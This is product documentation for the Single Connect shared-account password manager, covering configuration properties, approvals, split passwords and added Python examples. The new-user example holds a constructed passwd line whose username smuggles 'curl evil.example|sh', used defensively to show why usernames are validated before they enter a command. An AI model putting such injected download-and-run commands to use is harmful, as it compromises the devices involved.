SINGLE CONNECT
4 Single Connect Password Mana...
4.1 Managing SAPM (Shared Accounts Password Management) Accounts
Adding SAPM Configuration

Authorized users can create SAPM configurations and accounts. To add a configuration:

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Configuration tab.
4. Enter the name, strategy and description, and save.
5. Click the Search button to see the saved configurations.
6. Click the Option drop-down menu of the configuration and select Show Properties.
7. Type the related parameters and save.

SAPM Configuration Properties

Each property is given as property key, description and allowed value (pool value). The "pattern" properties are regular expressions matched against the device output.

Password change properties:

- allow seen by multiple user: When set to "true", the SAPM password can be seen by other users in the same user group. By default the SAPM password can be seen only by the user who retrieved it last. Value: true/false.
- change password after session login: When set to "true", the SAPM password is changed right after an RDP session that uses this SAPM account has been started by the Single Connect Session Manager. By default the password is not changed after being used by the Session Manager. Value: true/false.
- change password command template: Command set used to change the password. Value: device type specific. Example for a Cisco device:
  en\n${superpassword}\nconf t\nline con 0\npassword ${newpassword}\nline vty 0 4\npassword ${newpassword}\nline vty 5 15\npassword ${newpassword}\nenable secret ${newpassword}\nend\nwr me\nexit
- change password failure pattern: Output message that indicates the "change password" execution failed. Value: device type specific. Example for a Cisco device: % Invalid input detected
- change password only at change period: When set to "true", no duration is requested from the user, only a comment; the password is not changed after checkout, and other users can check out the same password until the next periodic change. By default the duration is requested from the user and the password is changed after checkout. Value: true/false.
- change password script template: The expect script used to change the password. Value: expect script.
- change password success pattern: Output message that indicates the "change password" execution succeeded. Value: device type specific.
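The following Python snippet is an added example, not Single Connect code, that shows how the three properties above fit together: the command template is expanded and split on its literal "\n" separators, and the device transcript is classified with the failure and success patterns as regular expressions. The template follows the Cisco example in the table; the success pattern ("wr me" printing "[OK]"), the two device transcripts and the passwords are constructed for the example. The passive-node transcript illustrates the note in the cluster section below: a failure pattern that matches the passive node's rejection is what stops a password change from being recorded there.

```python
import re
from string import Template

# Constructed values that follow the Cisco example in the property table; in the
# GUI the template is a single line with literal "\n" between commands.
CHANGE_PASSWORD_TEMPLATE = (
    "en\\n${superpassword}\\nconf t\\nline con 0\\npassword ${newpassword}"
    "\\nline vty 0 4\\npassword ${newpassword}\\nline vty 5 15\\npassword ${newpassword}"
    "\\nenable secret ${newpassword}\\nend\\nwr me\\nexit"
)
CHANGE_PASSWORD_FAILURE_PATTERN = r"% Invalid input detected"
# Assumption for this example: "wr me" on IOS prints "[OK]" once the config is saved.
CHANGE_PASSWORD_SUCCESS_PATTERN = r"\[OK\]"

# Constructed device transcripts: the active node accepts the change, a passive
# cluster node rejects configuration mode.
ACTIVE_NODE_OUTPUT = (
    "Enter configuration commands, one per line.  End with CNTL/Z.\n"
    "Building configuration...\n[OK]\n"
)
PASSIVE_NODE_OUTPUT = "% Invalid input detected at '^' marker.\n"


def render_template(template: str, **params: str) -> list:
    """Expand the ${...} placeholders and split on the literal "\\n" separators,
    giving the commands in the order they are sent. Raises KeyError if a
    placeholder has no value; a password containing "$" is inserted verbatim."""
    return Template(template).substitute(params).split("\\n")


def classify_output(output: str, success_pattern: str, failure_pattern: str) -> str:
    """Both properties are regular expressions. The failure pattern is tested first
    so that a transcript containing an error line is never recorded as a success
    just because a later line happens to match the success pattern."""
    if re.search(failure_pattern, output):
        return "failed"
    if re.search(success_pattern, output):
        return "succeeded"
    return "unknown"  # neither matched: do not assume the password was changed


def redact(commands: list, *secret_values: str) -> list:
    """Mask the super password and the new password before the rendered command
    set is written to a log or pasted into a support ticket."""
    masked = []
    for cmd in commands:
        for value in secret_values:
            cmd = cmd.replace(value, "********")
        masked.append(cmd)
    return masked


if __name__ == "__main__":
    cmds = render_template(CHANGE_PASSWORD_TEMPLATE,
                           superpassword="En4ble-Old", newpassword="N3w-V7y-p4ss")
    print("\n".join(redact(cmds, "En4ble-Old", "N3w-V7y-p4ss")))
    for name, transcript in (("active", ACTIVE_NODE_OUTPUT), ("passive", PASSIVE_NODE_OUTPUT)):
        print(name, classify_output(transcript, CHANGE_PASSWORD_SUCCESS_PATTERN,
                                    CHANGE_PASSWORD_FAILURE_PATTERN))
```

Because the patterns are regular expressions, characters such as "[" or "(" in a device message must be escaped in the property value, while "%" needs no escaping.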
Configuration properties (continued):

- change password with domain: When set to "true", the domain name is included in the command sent to AD servers for AD user password changes. By default it is "false" and the domain name is not included. Value: true/false.
- change period in day: Period after which the password is changed (unit: day). If "Change Period (Day)" is not set at the SAPM Accounts tab, this value is used. If neither the account's "Change Period" nor this property is set, an error occurs when changing the password. Value: integer (unit: day).
- change period in minute on fail: Period after which the password change is attempted again when a periodic password change fails. Value: integer (unit: minute).
- check new users with super user: Discover new users (created on the SAPM device) with the administrative user. Value: true/false.
- check password command template: Command set used to check password validity. Value: device type specific.
- check password success pattern: Output message that indicates the "check password" execution succeeded.
- check password validation: Enable or disable the password validity check. Value: true/false.
- check password with super user: Check password validity with the administrative user. Value: true/false.
- connection timeout: Timeout duration for the connection. Value: integer (unit: second).
- database driver: Database driver used to manage passwords in a database. Value: oracle/postgresql/mssqlserver/mysql/cassandra. Driver classes: oracle.jdbc.driver.OracleDriver, org.postgresql.Driver, com.microsoft.sqlserver.jdbc.SQLServerDriver, com.mysql.jdbc.Driver, org.apache.cassandra.cql.jdbc.CassandraDriver.
- delete list script template: The expect script used to delete users. Value: expect script.
- delete user command template: Command set used to delete a user. Value: device type specific.
- execute post command with super user: Execute the "post command" defined in a property with the administrative user. Value: true/false.
- file path: When "file" is chosen as the strategy, the path of the target file in which the password is changed. Both "file regex to match" and "file regex to replace" are required as well. Value: device type specific.
- file regex to match: Regular expression that matches the password field. Both "file path" and "file regex to replace" are required as well.
- file regex to replace: When "file regex to match" matches the password field, it is replaced with this value. Both "file regex to match" and "file path" are required as well.
- http change password body / headers / method / url: Body, headers, method and URL of the HTTP request that changes the password.
- http check password body / headers / method / url: Body, headers, method and URL of the HTTP request that checks the password.
- http delete user body / headers / method / url: Body, headers, method and URL of the HTTP request that deletes a user.
- http delete user success pattern: Output message that indicates the HTTP "delete user" request succeeded.
- http user list body / headers / method / url: Body, headers, method and URL of the HTTP request that lists users.
- ldap base dn: Base LDAP DN. Example: ou=testuser,dc=kron,dc=local
- ldap domain: Domain name included in the command sent to AD servers for AD user password changes when "change password with domain" is set to "true". Value: domain name.
- ldap ignore certificate: Ignore the server certificate for the LDAP/AD connection. Setting this to "true" disables verification of the LDAP/AD server's identity, so an on-path attacker could impersonate the directory; keep it "false" outside test setups. Value: true/false.
- ldap password attribute name: Configuration property for LDAP/AD. Unless there is an exception it is "userPassword".
- ldap username dn template: Configuration property for LDAP/AD. Example: cn=${username},dc=example,dc=com
- new password encryption key: Key used when "new password encryption method" is "aes". Value: device specific.
- new password encryption method: Value: clear / md5 / aes / unicode enclosed in double quotes.
- new user exception list: Users that are not listed in the new user list.
- new user found action: Functionality to enable when a new user is found. Value: log / nothing / delete / log and delete.
- password strength symbol chars: Pool of symbol characters. Value: custom. Example: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
- password strength lowercase count: Exact number of lowercase letters that must be included in the password. Value: integer.
- password strength number count: Exact number of digits that must be included in the password. Value: integer.
- password strength symbol count: Exact number of symbols that must be included in the password. Value: integer.
- password strength uppercase count: Exact number of uppercase letters that must be included in the password. Value: integer.
- post command: Commands executed on the server after the password has been changed successfully; multiple commands are separated by \n. Value: device type specific.
- post command failure pattern: If the pattern is found in the command results of the "post command", the command is considered "failed", command execution stops and the remaining commands are not executed. Value: device type specific.
- post command stop on fail: When set to "true", if any failure occurs the remaining commands are not executed. Default value is "false". Value: true/false.
- skip password validation after change: Must be "true" for TACACS devices. Value: true/false.
- ssh port: Port number when the strategy is "ssh". Value: device type specific.
- super password: Password of the super user who has administration rights over other users. Must be set when any "... with super user" property is set. Value: device specific.
- super username: Username of the super user who has administration rights over other users. Must be set when any "... with super user" property is set. Value: device specific.
- target url template: Destination AD/LDAP URL for an Active Directory user. Value: device specific.
- user list command: Command that pulls the user list. Examples: cat /etc/passwd, (objectclass=user)
- user list script template: The expect script used to check for new users. Value: expect script.
- username parser pattern: Pattern that finds the usernames in the user list output. Value: device type specific. Example: (.*?)

Duplicating SAPM Configuration

Users can duplicate an SAPM configuration together with all of its properties:

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Configuration tab.
4. Click the Search button to see the saved configurations.
5. Click the Option drop-down menu and select Duplicate.
6. Type the new name, select the strategy and save.

After saving, a duplicate configuration is created. The properties of the new configuration can be edited later.

Configuration to Show Password to Multiple Users

If an SAPM password is to be seen by the members of the same user group at the same time, the "allow seen by multiple user" property must be set to "true".

Configuration to Execute Commands After Changing Password

Some commands may need to be executed after a password change. For the "ssh" and "smb" strategies, set the following properties:

- post command: Commands executed on the server after the password has been changed successfully; multiple commands are separated by "\n".
- post command failure pattern: If the pattern is found in the command results of the "post command", command execution stops and the remaining commands are not executed.
- post command stop on fail: When set to "true", if any failure occurs the remaining commands are not executed. Default value is "false".
- execute post command with super user: When set to "true", the commands are executed by the super user. Default value is "false".

Note: For the "ssh" strategy, the last command in the "post command" property must be a logout command.

Example for Windows:
- post command: net stop dnscache\nnet start dnscache
- post command failure pattern: invalid
- post command stop on fail: false
- execute post command with super user: true

Example for Linux:
- post command: systemctl restart rsyslog\nlogout
- post command failure pattern: failed
- post command stop on fail: true
- execute post command with super user: true

Configuration for a Password Change Reminder

A reminder can be sent before the password change date arrives. To set a "password change reminder day":

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Configuration tab.
4. Click the Search button to see the saved configurations.
5. Click the Option drop-down menu of the related configuration and select Show Properties.
6. Set the "password change reminder day" property.

Note: The reminder mail is sent to the "sapmmaillist" defined in the device group properties.

Adding Accounts in SAPM

Authorized users can create SAPM accounts. To add an account:

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Enter the host, user name, password, change period and configuration name.
5. Save.

Note: If "Change Period (Day)" is not set at the SAPM Accounts tab, the "change period in day" parameter of the configuration is used for changing the password. If neither the account's "Change Period" nor the configuration's "change period in day" is set, an error occurs when changing the password.

Adding Cluster Accounts in SAPM

First an SAPM account is defined for the active cluster node; the other nodes are then defined as follows:

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the SAPM account defined for the active node and click the account's "Options" button.
5. Select the "Create Identical SAPM Account" option and enter the IP address of the other cluster node.

Note: No connection to the device is established in this "adding" step. The password of the first SAPM account of the cluster is assigned automatically to the identical accounts.

Note: A proper regular expression must be defined for the "change password failure pattern" property of the SAPM configuration, so that the password is not changed on the passive nodes.

To search for identical accounts:

1. Log in to the Single Connect GUI.
2. Navigate to the SAPM Management > SAPM Management section.
3. Open the SAPM Accounts tab.
4. Select an SAPM account and click the account's "Options" button.
5. Select the "Show Identical SAPM Account" option.

SSH Key Rotation by SAPM

SSH keys can be rotated periodically by the SAPM module. To add an SSH key:

1. Log in to the Single Connect GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Enter the host, change period and username.
5. Select "Linux SSH Key" as the configuration. This turns the password field into an "RSA Private Key" field.
6. Open an SSH session to the target device and copy the contents of /home/<username>/.ssh/id_rsa (or any other path that holds the user's RSA private key).
7. Paste the key into the "RSA Private Key" field.
8. Click "Save" and confirm the dialog box.

The SAPM account is saved and listed in the SAPM Accounts section. From this moment on, the SSH key is changed periodically. Checking out and resetting the SSH key works just like it does for normal SAPM accounts.

Adding Auto Import Rules

If many devices share the same username and password, this function can be used to add their SAPM accounts:

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Auto Import Rules tab.
4. Enter the rule name, device group, element type, SAPM configuration, SAPM username, password and change period.
5. Save.

Note: To change the number of threads that run the SAPM auto import jobs, change the "sapm job password change thread count" parameter on the Administration > System Config Man page. The default value is 5.

Adding Permissions to SAPM Accounts

Different authorization levels can be defined for SAPM accounts. To set permissions on an account:

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the account, click the Options button and then click the Permissions button.
5. Select the user group and the permission.
6. Save.

Permission types:

- Read Only: These users may only see the SAPM password.
- Full Control: Users with Full Control permission are the admins of this SAPM account. They have full authority, such as resetting and changing the password and granting permissions to users.
- Read Only First Part: These users may only see the first half of the SAPM password.
- Read Only Second Part: These users may only see the second half of the SAPM password.

A user can be a member of multiple user groups with different rights. In that case the following order applies: Full Control > Read Only > Read Only First Part > Read Only Second Part. A user who has both Full Control and Read Only rights gets Full Control, which is superior; a user who has both Read Only First Part and Read Only Second Part rights gets the first part of the password.

Create a One Time Password

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the account whose one time password is to be shown and, optionally, specify the reason for accessing the password.
5. From the Options drop-down menu, select Show Password.
6. A pop-up appears in which the expiration time is chosen.

Change Account Password Manually

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the account whose password is to be changed.
5. From the Options drop-down menu, click Update Password; the Update Password window opens.
6. Enter the current and the new password, then click Update.

Reset Account Password

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the account whose password is to be reset.
5. From the Options drop-down menu, select Reset Password.
6. Confirm the operation in the dialog box by clicking "Yes". The password is reset.

Checking New Users

SAPM can check for new users on a server once at least one SAPM account exists on that server:

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Click the Search button.
4. After the accounts are listed, click the Options button of one of the accounts.
5. Click "Check New Users" in the menu. SAPM checks the users and a pop-up informs the user about the process.

To view the new user list afterwards, open the New Users Log tab, fill in the filter fields and click the Search button.

Importing New Users to SAPM

New users can be imported into SAPM from the New Users Log screen:

1. Complete the "Checking New Users" steps described above.
2. Open the New Users Log tab.
3. Fill in the search fields and click Search.
4. Select the users to import by ticking their selection boxes (users imported together must have the same password).
5. Click the Import to SAPM button.
6. Fill in the configuration, change period and password fields and save.

Deleting New Users

New users can be deleted from the New Users Log screen:

1. Complete the "Checking New Users" steps described above.
2. Open the New Users Log tab.
3. Fill in the search fields and click Search.
4. Select the users to delete by ticking their selection boxes.
5. Click the Delete button.

Display Password Check Log

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Password Check Log tab.
4. Fill in the filter fields and click the Search button.

Display Password Change Log

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the Password Change Log tab.
4. Fill in the filter fields and click the Search button.

Display Password History Log

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management.
3. Open the SAPM Accounts tab.
4. Select the account whose password history is to be shown.
5. Click the Options button and select Show Old Passwords.

SAPM Dashboard

The SAPM dashboard shows a graphical report of the validity and change status of the passwords of the SAPM accounts in a parent device group. Managers can only access reports for device groups they are authorized to see.

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Accounts.
3. Open the SAPM Dashboard tab.
4. Choose the parent group for which the graphical report is shown.

Managing Passwords in a File

The Single Connect SAPM module can change passwords stored in a specific file:

1. Log in to the Single Connect web GUI.
2. Navigate to Device Management > Element Type.
3. Create a new element type or edit one of the existing types.
4. Set the element properties listed below, then create an SAPM account.

Element properties:
- sapm password change strategy
- sapm change password with super user
- sapm super username
- sapm super password
- sapm file path
- sapm file regex to match
- sapm file regex to replace

SAPM Notification Settings

SAPM mail list notifications:

1. Log in to the Single Connect web GUI.
2. Navigate to Device Management > Device Groups.
3. Right-click the device group containing the device of interest and select "Show Properties".
4. On the "Device Group Properties Information" screen, select "sapmmaillist" as the "Property Key" and enter the e-mail information.

The "sapmmaillist" is notified in the following cases:
- When a user retrieves the password of an SAPM account.
- If an error occurs while resetting the password of an SAPM account, a "Password Reset Failed" e-mail is sent.
- If the password cannot be verified during the periodic password check of an SAPM account, a "Password Check Problem" e-mail is sent.
- If a new user is detected on a device that has an SAPM account, a "New User(s) Found" e-mail is sent. (New user detection depends on the configuration and can therefore be disabled for specific accounts.)

Password Retrieval Approval Notifications

1. Log in to the Single Connect web GUI.
2. Navigate to Policy Control > Portal Functions.
3. Open the Function Group Definition tab.
4. Enter the function group name, then select the function.
5. Open the "Realm Definition" tab.
6. Set the realm for the user group and the SAPM approval function.

When a user who retrieves passwords with administrator approval only requests an SAPM password, a "SAPM Password Approval Request" e-mail is sent to:
- User groups that have the "Single Connect SAPM Admin" and "Single Connect SAPM Network Admin" portal functions. Single Connect SAPM Admin grants the right to manage all SAPM accounts and view all logs; Single Connect SAPM Network Admin grants the right to manage and view all accounts of the devices defined to the user.
- User groups with the Full Control permission for the SAPM account for which approval was requested.

Password Retrieval Second Level Approval Notifications

Users whose password retrieval requests need two-level approval must have the "SAPM Second Level Approval Requirement" function group defined in their portal functions realm:

1. Log in to the Single Connect web GUI as an admin.
2. Navigate to Policy Control > Portal Functions.
3. Set the realm between the "SAPM Second Level Approval Requirement" function group and the user group of the user who needs second level approval.

When such a user requests an SAPM password, a "SAPM Password Approval Request" e-mail is sent to the first level approvers:
- User groups that have the "Single Connect SAPM Admin" and "Single Connect SAPM Network Admin" portal functions. Single Connect SAPM Admin grants the right to manage all SAPM accounts and view all logs; Single Connect SAPM Network Admin grants the right to manage and view all accounts of the devices defined to the user in device group realms.
- User groups with the Full Control permission for the SAPM account for which approval was requested.

To define the first level approvers:

1. Log in to the Single Connect web GUI as an admin.
2. Navigate to Policy Control > Portal Functions.
3. Set the realm between the "SAPM Admin" function group and the user group that may give the "first approval" for all password retrieval requests, and/or set the realm between the "SAPM Network Admin" function group and the user group that may give the "first approval" only for requests concerning the devices in their device group realms.

Only when a user from these lists approves the initial request is a "SAPM Password Approval Request" e-mail sent to the second level approvers:
- User groups that have the "Single Connect SAPM Second Level Admin" and "Single Connect SAPM Second Level Network Admin" portal functions. Single Connect SAPM Second Level Admin grants the right to give second level approval for all SAPM accounts and view all logs; Single Connect SAPM Second Level Network Admin grants the right to give second level approval for all accounts of the devices defined to the user's device group realms.

To define the second level approvers:

1. Log in to the Single Connect web GUI as an admin.
2. Navigate to Policy Control > Portal Functions.
3. Set the realm between the "SAPM Second Level Admin" function group and the user group that may give the second approval for all password retrieval requests, and/or set the realm between the "SAPM Second Level Network Admin" function group and the user group that may give the second level approval only for requests concerning the devices in their device group realms.

Only when a user from these lists approves the second level request does the requester receive an e-mail and proceed to password checkout. If any of the authorizers denies the request, informational e-mails are sent to all participants and the request is terminated.

Future Date Reservation

Password retrieval for an SAPM account can be reserved for a future date:

1. Log in to the Single Connect web GUI.
2. Navigate to SAPM Management > SAPM Management.
3. Open the SAPM Accounts tab.
4. Click the "Search" button to search for the accounts.
5. Click the "Options" button of the account whose password is to be reserved.
6. Select "Password Reservation" from the drop-down menu.
7. In the pop-up, specify the start time, reservation duration, reminder, comments and, if "split password" is applied to the account, the first part and second part users.
8. Click Reserve. The reservation appears in the search results.

If one- or two-level approval applies to the user, the approvers must approve the reservation before the user gets the password. Once all approvals are complete, the user receives a reminder e-mail at the reminder time and the password e-mail at the reservation time. Past and future reservations can be searched in the "Reservation" tab; to delete one, click the "Options" button next to the reservation and select "Delete Reservation".

Note: Password reservation only works when the SAPM passwordreservation job is triggered periodically.

Split Password Feature

To enforce a two-party approval process, the password of an SAPM account can be split into two parts that are retrieved by different users. After placing the users in different user groups:

1. Log in to the Single Connect web GUI as an admin user.
2. Navigate to Device Management > Device Groups.
3. Open the "Device Group Realms" tab.
4. Create the device group realm between the user groups and the device group containing the target device.
5. Navigate to SAPM Management > SAPM Management.
6. Search for the accounts.
7. Click the "Options" button of the SAPM account.
8. Select "Permissions" to open the Permissions pop-up window.
9. Define the "Read Only First Part" permission type for the user group that receives the first part of the password.
10. Define the "Read Only Second Part" permission type for the user group that receives the second part of the password.
11. Close the Permissions pop-up window.
12. Navigate to Policy Control > Portal Functions.
13. Create a portal realm with the "SAPM Management" function group for both user groups.

After these steps, the users log in and retrieve their parts of the password from the SAPM Management section like a normal password retrieval. They can log in to the target system with the SAPM username and the password combined in the correct order. If one- or two-level approval applies to the user, the user receives the related part by e-mail when the approval process is completed.
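The following Python snippet is an added example, not Single Connect code, for the "Managing Passwords in a File" procedure and the "password strength ..." properties above: it generates a password with exactly the configured number of characters from each class and rotates it into a configuration file with a match regex and a replace value. The policy values, the regexes, the sample file and the use of "\1" and "${newpassword}" in the replace value are constructed assumptions for the example (the page does not specify the replacement syntax). The rotation refuses to run unless exactly one field matches, never lets the generated password be parsed as a regex replacement, and writes the file atomically while preserving its mode.

```python
import re
import secrets
import string
import tempfile
from pathlib import Path

# Constructed "password strength ..." property values; a custom symbol pool is
# used, as the "password strength symbol chars" property allows.
STRENGTH_POLICY = {
    "uppercase count": 3,
    "lowercase count": 6,
    "number count": 3,
    "symbol count": 2,
    "symbol chars": "!#%+,-.:_",
}
# Constructed "file regex to match" / "file regex to replace" values. Assumption:
# the replace value may reference capture groups with \1 and carries ${newpassword}
# as the placeholder, mirroring the command templates on this page.
FILE_REGEX_TO_MATCH = r"^(db_password=).*$"
FILE_REGEX_TO_REPLACE = r"\1${newpassword}"
# Constructed target file content.
SAMPLE_CONFIG = "[database]\nhost=db01.example.internal\ndb_password=OldPassw0rd!\ntimeout=30\n"


def generate_password(policy: dict) -> str:
    """Exactly the configured number of each character class, shuffled with a CSPRNG."""
    rng = secrets.SystemRandom()
    chars = (
        [rng.choice(string.ascii_uppercase) for _ in range(policy["uppercase count"])]
        + [rng.choice(string.ascii_lowercase) for _ in range(policy["lowercase count"])]
        + [rng.choice(string.digits) for _ in range(policy["number count"])]
        + [rng.choice(policy["symbol chars"]) for _ in range(policy["symbol count"])]
    )
    rng.shuffle(chars)
    return "".join(chars)


def meets_policy(password: str, policy: dict) -> bool:
    """The strength properties are exact counts, not minimums: check them as such."""
    counts = {
        "uppercase count": sum(c in string.ascii_uppercase for c in password),
        "lowercase count": sum(c in string.ascii_lowercase for c in password),
        "number count": sum(c in string.digits for c in password),
        "symbol count": sum(c in policy["symbol chars"] for c in password),
    }
    return all(counts[k] == policy[k] for k in counts) and sum(counts.values()) == len(password)


def rotate_password_in_file(path: Path, match_regex: str, replace_value: str,
                            new_password: str) -> str:
    """Rewrite the single line matched by "file regex to match" and return the new text.

    A pattern that also hits a comment or a second credential would leak the new
    secret or clobber another account, so anything but exactly one match is refused."""
    pattern = re.compile(match_regex, re.MULTILINE)
    text = path.read_text(encoding="utf-8")
    hits = list(pattern.finditer(text))
    if len(hits) != 1:
        raise ValueError(f"expected exactly one password field in {path}, found {len(hits)}")
    # m.expand resolves \1 in the replace value; the password is spliced in afterwards
    # as a literal, so backslashes or "\1" inside it are never interpreted.
    new_text = pattern.sub(
        lambda m: m.expand(replace_value).replace("${newpassword}", new_password), text)
    tmp = path.with_name(path.name + ".sapm-tmp")
    tmp.write_text(new_text, encoding="utf-8")
    tmp.chmod(path.stat().st_mode & 0o777)  # keep the original, restrictive mode
    tmp.replace(path)                          # atomic rename: never a half-written file
    return new_text


def demo() -> dict:
    """Run the rotation on the constructed file in a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        cfg = Path(d) / "app.conf"
        cfg.write_text(SAMPLE_CONFIG, encoding="utf-8")
        cfg.chmod(0o600)
        pw = generate_password(STRENGTH_POLICY)
        new_text = rotate_password_in_file(cfg, FILE_REGEX_TO_MATCH, FILE_REGEX_TO_REPLACE, pw)
        # A file with two candidate fields must be refused and left untouched.
        two = Path(d) / "two.conf"
        two.write_text("db_password=a\ndb_password=b\n", encoding="utf-8")
        try:
            rotate_password_in_file(two, FILE_REGEX_TO_MATCH, FILE_REGEX_TO_REPLACE, pw)
            refused = False
        except ValueError:
            refused = two.read_text(encoding="utf-8") == "db_password=a\ndb_password=b\n"
    return {"password": pw, "new_text": new_text, "duplicate_refused": refused}


if __name__ == "__main__":
    print(demo()["new_text"])
```

Anchor the match regex to the whole line (^ ... $) as above: an unanchored "password=.*" would also match "db_password=" lines elsewhere in the file and fail the single-match check, which is the intended outcome rather than a silent wrong replacement.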
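The following Python snippet is an added example, not Single Connect code, for "Checking New Users" and the "user list command", "username parser pattern", "new user exception list" and "new user found action" properties: it parses a constructed "cat /etc/passwd" listing, removes known SAPM accounts and excepted system users, and turns the configured action into log lines and delete commands. The parser pattern, the exception list, the "userdel" delete template and the passwd lines are constructed assumptions. The point a practitioner should take from it is that a username read back from a device that may already be compromised is attacker-controlled input, so it is validated before it is ever placed in a command template.

```python
import re
from string import Template

# Constructed property values: a parser that captures the first passwd field, an
# exception list of system accounts and a delete template in the spirit of the
# "delete user command template" property.
USERNAME_PARSER_PATTERN = r"^([^:]+):"
NEW_USER_EXCEPTION_LIST = {"root", "daemon", "bin", "sys", "nobody"}
DELETE_USER_COMMAND_TEMPLATE = "userdel -r ${username}"
# Linux username rule (useradd default); anything else is treated as hostile.
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")

# Constructed "user list command" output as "cat /etc/passwd" would return it.
# The last line is an account a root-level attacker added with a hostile name.
USER_LIST_OUTPUT = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
svc-backup:x:1001:1001::/home/svc-backup:/bin/bash
jdoe:x:1002:1002::/home/jdoe:/bin/bash
x;curl evil.example|sh:x:0:1003::/tmp:/bin/bash
"""
KNOWN_SAPM_USERS = {"svc-backup"}


def parse_usernames(output: str, pattern: str) -> list:
    """Apply the "username parser pattern" to every line of the listing."""
    regex = re.compile(pattern)
    names = []
    for line in output.splitlines():
        m = regex.match(line)
        if m:
            names.append(m.group(1))
    return names


def find_new_users(usernames, known, exceptions) -> list:
    """New = present on the device, not an SAPM account, not excepted (exact match)."""
    return sorted(u for u in usernames if u not in known and u not in exceptions)


def plan_action(new_users, action: str) -> dict:
    """Translate "new user found action" into log lines and delete commands.

    Nothing is executed here. A name failing VALID_USERNAME is reported but never
    rendered into a command: rendered as-is, the hostile line above would become
    "userdel -r x;curl evil.example|sh" and run attacker code on the device."""
    if action not in {"log", "nothing", "delete", "log and delete"}:
        raise ValueError(f"unknown new user found action: {action}")
    plan = {"log": [], "delete": [], "rejected": []}
    for user in new_users:
        if "log" in action:
            plan["log"].append(f"new user found: {user!r}")
        if "delete" in action:
            if VALID_USERNAME.match(user):
                plan["delete"].append(
                    Template(DELETE_USER_COMMAND_TEMPLATE).substitute(username=user))
            else:
                plan["rejected"].append(user)
    return plan


if __name__ == "__main__":
    found = find_new_users(parse_usernames(USER_LIST_OUTPUT, USERNAME_PARSER_PATTERN),
                           KNOWN_SAPM_USERS, NEW_USER_EXCEPTION_LIST)
    for key, items in plan_action(found, "log and delete").items():
        print(key, items)
```

The exception list is matched exactly; a substring or prefix match would let an attacker hide an account called "root2" or "nobody-" from the report.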
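The following Python snippet is an added example, not Single Connect code, for the permission precedence described under "Adding Permissions to SAPM Accounts" and for the "Split Password Feature": it resolves a user's effective permission from several group memberships using the order Full Control > Read Only > Read Only First Part > Read Only Second Part, returns the part of the password that permission reveals, and audits which users can see the whole password on their own, which would defeat the two-party retrieval. The group names, memberships and the assumption that an odd-length password gives its extra character to the first part are constructed for the example.

```python
from enum import IntEnum
from typing import Optional


class Permission(IntEnum):
    """SAPM account permission types, ordered as the page ranks them."""
    READ_ONLY_SECOND_PART = 1
    READ_ONLY_FIRST_PART = 2
    READ_ONLY = 3
    FULL_CONTROL = 4


# Constructed data: the permission each user group holds on one SAPM account,
# and the groups each user belongs to.
ACCOUNT_PERMISSIONS = {
    "sapm-admins": Permission.FULL_CONTROL,
    "noc-readers": Permission.READ_ONLY,
    "key-holders-a": Permission.READ_ONLY_FIRST_PART,
    "key-holders-b": Permission.READ_ONLY_SECOND_PART,
}
USER_GROUPS = {
    "alice": {"sapm-admins", "noc-readers"},
    "bob": {"noc-readers", "key-holders-b"},
    "carol": {"key-holders-a"},
    "dave": {"key-holders-b"},
    "erin": {"key-holders-a", "key-holders-b"},
    "frank": set(),
}


def effective_permission(groups, account_permissions) -> Optional[Permission]:
    """A member of several groups gets the single strongest permission (the
    precedence order on the page); no matching group means no access at all."""
    granted = [account_permissions[g] for g in groups if g in account_permissions]
    return max(granted) if granted else None


def split_password(password: str) -> tuple:
    """First and second part. Assumption: for an odd length the first part is longer."""
    mid = (len(password) + 1) // 2
    return password[:mid], password[mid:]


def visible_password(password: str, permission: Optional[Permission]) -> Optional[str]:
    """What a user holding `permission` is shown at checkout."""
    if permission in (Permission.FULL_CONTROL, Permission.READ_ONLY):
        return password
    first, second = split_password(password)
    if permission is Permission.READ_ONLY_FIRST_PART:
        return first
    if permission is Permission.READ_ONLY_SECOND_PART:
        return second
    return None


def can_reset_or_change(permission: Optional[Permission]) -> bool:
    """Only Full Control may reset or change the password or grant permissions."""
    return permission is Permission.FULL_CONTROL


def whole_password_holders(user_groups, account_permissions) -> list:
    """Dual-control audit: every user who can see the entire password alone bypasses
    the split, so each name returned should be a deliberate, reviewed exception."""
    return sorted(
        user for user, groups in user_groups.items()
        if effective_permission(groups, account_permissions)
        in (Permission.FULL_CONTROL, Permission.READ_ONLY)
    )


if __name__ == "__main__":
    secret = "Tr0ub4dor&3-xYz"  # constructed account password
    for user, groups in USER_GROUPS.items():
        perm = effective_permission(groups, ACCOUNT_PERMISSIONS)
        print(f"{user:6} {perm.name if perm else 'NONE':22} sees {visible_password(secret, perm)!r}")
    print("can see whole password:", whole_password_holders(USER_GROUPS, ACCOUNT_PERMISSIONS))
```

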